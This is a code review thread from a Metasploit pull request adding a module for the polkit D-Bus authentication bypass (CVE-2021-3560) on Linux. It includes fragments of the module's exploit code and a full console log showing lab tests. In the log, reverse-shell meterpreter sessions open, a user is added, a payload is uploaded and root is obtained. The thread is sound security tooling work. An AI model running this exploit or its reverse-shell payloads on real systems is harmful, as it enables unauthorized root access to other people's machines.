Polkit Privilege Escaltion (CVE-2021-3560)
rapid7/metasploit-framework pull request #15368
Opened 2021-06-24 04:18 UTC by jheysel-r7

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

2021-06-24 04:48 UTC, bcoles commented on metasploit-framework.gemspec
> +  spec.add_runtime_dependency 'unix-crypt'
Is this required? It would be best not to add additional dependencies.

The Sudo Baron Samedit module uses the following approach to construct a password hash:

https://github.com/rapid7/metasploit-framework/blob/2a6caae2155dd4b6cf9e065d9bc95d4f8e8cd29e/modules/exploits/linux/local/sudo_baron_samedit.rb#L282-L291

2021-06-24 13:39 UTC, smcintyre-r7 commented on metasploit-framework.gemspec
> +  spec.add_runtime_dependency 'unix-crypt'
Yeah you're right. That's a [builtin](https://www.rubydoc.info/stdlib/core/String:crypt) method that I didn't know about. Should be safe to do it this way and remove that dependency. Good catch 👍 .

2021-06-24 13:43 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +##
Would you mind renaming this module? I think  `polkit_priv_esc` is a little too generic. Because it's under the exploits / local path, we know it's an LPE so the `priv_esc` suffix is a little redundant. Also, if there's another vulnerability in polkit in the future, since it's a local service it is highly probable that it too will be a privilege escalation / LPE. We can avoid future ambiguity by naming it something a little more specific to this particular module / vulnerability like `polkit_dbus_auth_bypass`.

2021-06-24 14:44 UTC, adfoster-r7 commented on metasploit-framework.gemspec
> +  spec.add_runtime_dependency 'unix-crypt'
Probably worth double checking the behavior is as expected here on a few different systems, I think there's maybe cross-compatibility issues with `string.crypt`

2021-06-24 14:44 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +        # DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 },
```suggestion
```

2021-06-24 14:51 UTC, bcoles commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
This looks extremely brittle.

It requires both `su` and `sudo` (why?) - the former may not be executable on a hardened system and the latter may not be installed.

Also the arguments aren't quoted, so any shell meta characters in the password will cause this to break.

2021-06-24 14:52 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempt
Potentially an opt int

2021-06-24 14:53 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +      OptString.new('CMDDELAY', [
Not opinionated:

```suggestion
      OptString.new('CMD_DELAY', [
```

2021-06-24 14:54 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +        if id #{datastore['USERNAME']}; then#{' '}
Just verifying if the extra spaces at the end are needed 👀 

```suggestion
        if id #{datastore['USERNAME']}; then
```

2021-06-24 14:57 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +        # TODO: remove_user
:+1:

2021-06-24 14:58 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +      fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
Might need a small word tweak, but may also be removed in the future - so who knows! 🎉 
> This could be due to race condition that the vulnerability

2021-06-24 14:59 UTC, adfoster-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +        remove_user
Can we remove this, if we don't have the password set? 🤔

2021-06-24 15:05 UTC, bcoles commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
Presumably this may also spam pkexec agent authentication dialogs.

```suggestion
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS],
```

2021-06-24 15:06 UTC, bcoles commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +      OptString.new('WRITEABLEDIR', [ true, 'A directory where you can write files.', '/tmp' ]),
Convention is to register this as an advanced option named `WritableDir`.

```ruby
    register_advanced_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp/'])
    ])
```

2021-06-24 15:07 UTC, bcoles commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +          ['CVE', '2021-3560'],
```suggestion
          ['CVE', '2021-3560'],
          ['EDB', '50011'],
```

2021-06-24 17:46 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
> It requires both su and sudo (why?) - the former may not be executable on a hardened system and the latter may not be installed.

Because the exploit adds a user with sudo privileges. The root user's password is not known, so we need to use `su` to execute `sudo` as the new user to elevate to root. I thought maybe sudo's `-u` option could work but that appears to require the current user's password which is not a known value. Do you have an alternative in mind that could be used to replace this?

> Also the arguments aren't quoted, so any shell meta characters in the password will cause this to break.

The `PASSWORD` datastore option uses a regular expression to validate that it consists of valid characters so this should not be an issue.

2021-06-24 17:53 UTC, smcintyre-r7 commented on metasploit-framework.gemspec
> +  spec.add_runtime_dependency 'unix-crypt'
Testing this using Ruby 2.5 on Windows shows that the behavior is infact different. Since we need to keep Metasploit cross-platform we'll keep the gem for now. We should also update the `sudo_baron_samedit` module to use the `unix-crypt` gem and avoid this problem but that should probably be in another PR.

## Linux with Ruby 2.7
```
>> "password".crypt('$6$111xqnhs')
=> "$6$111xqnhs$QqlfP/1dQNNkpc83oaY/tlpN5l1hbbWADcikaWEgY2bEXi/B.HjUW6B17U.EaHzJmpBZMgc0zubLbb4prD17y."
```

## Windows with Ruby 2.5
```
C:\Users\smcintyre>irb
irb(main):001:0> "password".crypt('$6$111xqnhs')
=> "$6FMi11BJFsAc"
```

2021-06-25 06:23 UTC, bcoles commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
> Do you have an alternative in mind that could be used to replace this?

Nothing specific.

The writeup suggests exploiting via a SSH session to prevent polkit popups, which implies an SSH server is present, which means `ssh` client is likely to be present. `ssh user@127.0.0.1 /path/to/payload` is one potential alternative to bypass the `su` requirement, although somewhat cumbersome.

If `su` is required, the `check` method could test `is_executable?('/bin/su')`.

2021-06-28 15:02 UTC, jheysel-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
I avoided using SSH as it wasn't present by default on the Ubuntu 20.04 target I was testing on. 

I've added  `is_executable?('/bin/su')` to the check method. Thanks for bringing this up!

2021-06-28 15:15 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
> If su is required, the check method could test is_executable?('/bin/su').

That's a good call, we should check if `su` is executable. Since the host can technically still be vulnerable though, the check should take place in the exploit method and fail with an error that the exploit won't work in the target environment. `Failure::NotFound` or `Failure::NoTarget` would work for this case.

2021-06-28 17:53 UTC, jheysel-r7 commented on modules/exploits/linux/local/polkit_priv_esc.rb
> +        remove_user
You can remove the user if the password has not been set. I've made some changes so in the event setting the password fails, we still try to remove the user:
```
[+] User bob created with UID 1020
[*] Attempting to set the password of the newly create user, bob, to: lRD6uvgH
[-] Attempted setting the password 20 times, did not work.
[*] Attempting to remove the user added: 
[+] Successfully removed bob
[*] Exploit completed, but no session was created.
```

2021-06-28 21:38 UTC, space-r7 reviewed
Hey @jheysel-r7, review is mostly just small style-related stuff and some typos. Thanks for the module!

2021-06-28 21:38 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +          print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
```suggestion
          print_error('Failed to restore the root user\'s original \'RealName\' property value')
```

2021-06-28 21:38 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +    fail_with(Failure::NotFound, 'Failed to access /bin/su which this exploit depends on.') unless executable?('/bin/su')
Also might want to check if the `dbus-send` command exists before proceeding with the exploit.

2021-06-28 21:38 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
```suggestion
      print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
```

2021-06-28 21:38 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +      elsif arg.is_a? String
```suggestion
      if arg.is_a?(Integer)
        cmd_args << "int32:#{arg}"
      elsif arg.is_a?(String)
```

2021-06-29 19:13 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +  end
The `time = cmd_exec(time_command)...` line is resulting in this error for me currently:

```
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
```

Looks like `dbus-send` takes longer than `cmd_exec()`'s default timeout of 15 seconds, so accessing the resulting match data when `nil` causes a crash.

To get around the timeout issue, you could either supply a static timeout value or create an additional `TIMEOUT` option to supply to `cmd_exec()`, so the user has control over that. Going with the latter option is probably best since the execution time will most likely vary on a per-target basis.

Since `cmd_exec()` could still fail, check the match data before accessing it:

```ruby
time = cmd_exec(time_command, nil, timeout).match(/real\s+\d+m(\d+.\d+)s/)
unless time && time[1]
  print_error("Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}")
  return nil
end
time = time[1].to_f / 2
```

Since this method is called by the `check()` method (always should return a `CheckCode`), I suggest using a `print_error()` / return `nil` when we fail to retrieve the time.

2021-06-30 15:33 UTC, jheysel-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +  end
Thanks so much for testing and taking the time to explain all this in detail! All makes sense, I'll try testing on a couple different targets next time to try and catch these types of issues 👍

2021-06-30 16:15 UTC, space-r7 reviewed
Changes look good to me, thanks! I just added a suggestion for the module name and adding a check on the return value from `get_cmd_delay()`. The only other think I'd suggest is squashing some of the commits for a cleaner commit history.

2021-06-30 16:15 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +        'Name' => 'Polkit Authentication Bypass',
```suggestion
        'Name' => 'Polkit D-Bus Authentication Bypass',
```

2021-06-30 16:15 UTC, space-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +    @cmd_delay = get_cmd_delay
Make sure this isn't `nil` before using it.

2021-07-07 01:21 UTC, gwillcox-r7 requested changes

2021-07-07 14:44 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +  include Msf::Exploit::EXE
The way Metasploit's naming works, the EXE mixin here is required for executable file generation including ELF executables, so yes it's required.

2021-07-07 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +            [ 'Automatic', {} ],
It's fine, this is a common convention for the automatic target in alot of our exploit modules.

2021-07-07 14:49 UTC, smcintyre-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +  end
The `upload_and_chmodx` and `upload` function's aren't defined in `post/file.rb`. These ones combine the operation into a as single one and add some printed output. Removing the file is helpful to make sure the target is overwritten.

2021-07-07 16:36 UTC, gwillcox-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +      OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
https://unix.stackexchange.com/questions/157426/what-is-the-regex-to-validate-linux-users answers all, this is fine.

2021-07-07 16:47 UTC, gwillcox-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +    polkit_version = Rex::Version.new(Regexp.last_match(1))
We'll ignore the `nil` issue since this isn't really a problem, but the next commit should move this call earlier up in the code so that it now uses the right regex results.

2021-07-07 16:48 UTC, gwillcox-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +          echo \"failed\";
Going to leave this as something we can address in the future if we want but for now this isn't a blocker. Marking resolved.

2021-07-07 17:01 UTC, gwillcox-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +    polkit_version = Rex::Version.new(Regexp.last_match(1))
Fixed with https://github.com/rapid7/metasploit-framework/pull/15368/commits/d4a6976bdebabaac020a60ec45af6d609b8111fd

2021-07-07 17:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
> +7. It is possible for the exploit to fail, increase the ITERATIONS module option to attempt the exploit more times before failing and run again.
Fixed with https://github.com/rapid7/metasploit-framework/pull/15368/commits/d4a6976bdebabaac020a60ec45af6d609b8111fd

2021-07-07 17:01 UTC, gwillcox-r7 commented on modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
> +    @cmd_delay = get_cmd_delay
Fixed with https://github.com/rapid7/metasploit-framework/pull/15368/commits/d4a6976bdebabaac020a60ec45af6d609b8111fd

2021-07-07 21:55 UTC, wvu-r7 commented on metasploit-framework.gemspec
> +  spec.add_runtime_dependency 'unix-crypt'
That's a pretty big portability gotcha!

2021-07-08 16:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
> +The following output (tty) indicates a non-graphic session is being use and the exploit is likely to be successful:
`used` not `use`

2021-07-08 17:01 UTC, gwillcox-r7 approved these changes

2021-07-08 18:51 UTC, gwillcox-r7 commented
Test shows this works over an SSH session:

```
msf6 > use exploit/multi/ssh/sshexec 
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ssh/sshexec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/ssh/sshexec) > set USERNAME guest
USERNAME => guest
msf6 exploit(multi/ssh/sshexec) > set PASSWORD guest123
PASSWORD => guest123
msf6 exploit(multi/ssh/sshexec) > set RHOST 192.168.224.165
RHOST => 192.168.224.165
msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.224.128:4444 
[*] 192.168.224.165:22 - Sending stager...
[*] Command Stager progress -  46.74% done (402/860 bytes)
[*] Sending stage (3012548 bytes) to 192.168.224.165
[*] Meterpreter session 1 opened (192.168.224.128:4444 -> 192.168.224.165:52862) at 2021-07-08 13:46:02 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)

meterpreter > sysinfo
Computer     : 192.168.224.165
OS           : Ubuntu 20.04 (Linux 5.8.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > id
[-] Unknown command: id
meterpreter > getuid
Server username: guest @ ubuntu (uid=1001, gid=1001, euid=1001, egid=1001)
meterpreter > shell
Process 2576 created.
Channel 1 created.
id
uid=1001(guest) gid=1001(guest) groups=1001(guest)
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/polkit_dbus_auth_bypass 
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > show options

Module options (exploit/linux/local/polkit_dbus_auth_bypass):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ITERATIONS  20               yes       Due to the race condition the command might have to be run
                                           multiple times before it is successful. Use this to defin
                                          e how many times each command is attempted
   PASSWORD    oLWvBkWH         yes       A password to add for the user (default: random)
   SESSION                      yes       The session to run this module on.
   TIMEOUT     15               yes       The maximum time in seconds to wait for each request to fi
                                          nish
   USERNAME    msf              yes       A username to add as root


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set LPORT 8899
LPORT => 8899
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > exploit

[-] Exploit failed: One or more options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set SESSION 1 
SESSION => 1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > check

[*] Checking for exploitability via attempt
[*] Checking for exploitability via version
[*] The target appears to be vulnerable. Version 0.105-26ubuntu1 is affected.
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8899 
[*] Executing automatic check (disable AutoCheck to override)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user msf
[+] User msf created with UID 1002
[*] Attempting to set the password of the newly created user, msf, to: oLWvBkWH
[+] Obtained code execution has root!
[*] Writing '/tmp/gQSLT' (250 bytes) ...
[*] Sending stage (3012548 bytes) to 192.168.224.165
[+] Deleted /tmp/gQSLT
[*] Meterpreter session 2 opened (192.168.224.128:8899 -> 192.168.224.165:40992) at 2021-07-08 13:47:39 -0500
[*] Attempting to remove the user added: 
[+] Successfully removed msf

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.224.165
OS           : Ubuntu 20.04 (Linux 5.8.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x64/linux  guest @ ubuntu (uid=1001, gid=1001, euid=1001  192.168.224.128:4444 -> 192.168.224.165:52862
                                   , egid=1001) @ 192.168.224.165                 (192.168.224.165)
  2         meterpreter x64/linux  root @ ubuntu (uid=0, gid=0, euid=0, egid=0)   192.168.224.128:8899 -> 192.168.224.165:40992
                                   @ 192.168.224.165                              (192.168.224.165)

msf6 exploit(linux/local/polkit_dbus_auth_bypass) > 
```

2021-07-08 20:54 UTC, wvu-r7 commented on documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
> -[+] Obtained code execution has root!
haz root*

2021-07-08 20:56 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
> -[+] Obtained code execution has root!
Think this should be solved with https://github.com/rapid7/metasploit-framework/pull/15368/commits/5011e950d30510d3fdaa5212bf513bf109f72d80?

2021-07-08 21:30 UTC, gwillcox-r7 commented
Rebasing to clear up the commit history a bit, I've tested this again and confirmed its working as expected after the rebase so will land this once the tests pass. In case there is an issue, note that @bcoles and @space-r7 also helped with this PR and helped with some of the commits in cleaning up the module and the documentation.

2021-07-08 21:57 UTC, merged

2021-07-08 22:03 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`.